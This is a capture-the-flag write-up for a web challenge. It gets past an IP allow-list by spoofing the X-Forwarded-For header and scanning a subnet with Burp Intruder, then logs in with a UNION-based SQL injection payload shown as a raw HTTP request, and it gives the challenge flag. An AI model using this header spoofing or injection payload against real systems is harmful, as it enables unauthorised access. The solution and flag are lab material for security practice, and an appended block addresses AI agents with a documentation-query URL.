# Star Cereal 2

## Description

Ha, that was sneaky! But I've patched the login so that people like you can't gain access anymore. Stop hacking us!

`http://20.198.209.142:55045`

*The flag is in the flag format: STC{...}*

**Author: zeyu2001**

## Solution

In `index.php`, notice the following comment

```markup
<!--
Star Cereal page by zeyu2001

TODO:
    1) URGENT - fix login vulnerability by disallowing external logins (done)
    2) Integrate admin console currently hosted at http://172.16.2.155
-->
```

Point 1) is referring to the previous challenge. Point 2) is interesting.

If we go to `login.php`, we get a 403 Forbidden Page:

```markup
<h1>Forbidden</h1>
<p>Only admins allowed to login.</p>
```

### Spoofable Client IP

We could deduce that perhaps the server filters requests by the client IP.

A common security misconfiguration in implementing such a filter is the use of the [X-Forwarded-For header](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For). This header is used for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer.

Note that HTTP request headers can be [easily spoofed](https://portswigger.net/kb/issues/00400110_spoofable-client-ip-address). Knowing that one of the internal IP addresses is 172.16.2.155, we may want to check the 172.16.2.0/24 subnet for valid client IPs.

If we do a scan (e.g. using Burp Suite Intruder) for the 172.16.2.0/24 subnet with the `X-Forwarded-For` header, we would find that if we set:

```http
X-Forwarded-For: 172.16.2.24
```

then we would see the login page.

### Burp Suite Intruder Scan

First, set the payload position as follows:

![](/files/iOwuJsc3sdvsSwGu4y1F)

Then, configure the payload as a list of numbers from 1 to 255.

![](/files/yl5z7JAuZnkjBi5kW0Wl)

Run the attack. Sort the output by either the Status or Length columns. We will find that `X-Forwarded-For: 172.16.2.24` gives us a 200 OK response code, and shows us the login page.

![](/files/Lz1fxvlCQYCXIo2AdP8N)

### SQL Injection

Once we have access to the login page, notice the login form fields.

```markup
<form action="/login.php" method="post">
	<div class="form-group">
		<label for="email">Email address</label>
		<input type="email" class="form-control" id="email" name="email" placeholder="Enter email">
	</div>
	<div class="form-group">
		<label for="pass">Password</label>
		<input type="pass" class="form-control" id="pass" name="pass" placeholder="Enter password">
	</div>
	<button type="submit" class="btn btn-primary">Submit</button>
</form>
```

We need to submit an `email` and a `pass` parameter. We can exploit SQL injection to get the flag.

```http
POST /login.php HTTP/1.1
Host: localhost:55043
X-Forwarded-For: 172.16.2.24

...

Content-Type: application/x-www-form-urlencoded
Content-Length: 51

email=test&pass=test' UNION SELECT 'test', 'test';#
```

The flag is `STC{w0w_you'r3_r3lly_a_l33t_h4x0r_bc1d4611be52117c9a8bb99bf572d6a7}`.

![](/files/Q5NY5q47w5XL4gcJ6Pb8)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.zeyu2001.com/my-challenges/standcon-ctf-2021/star-cereal-2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.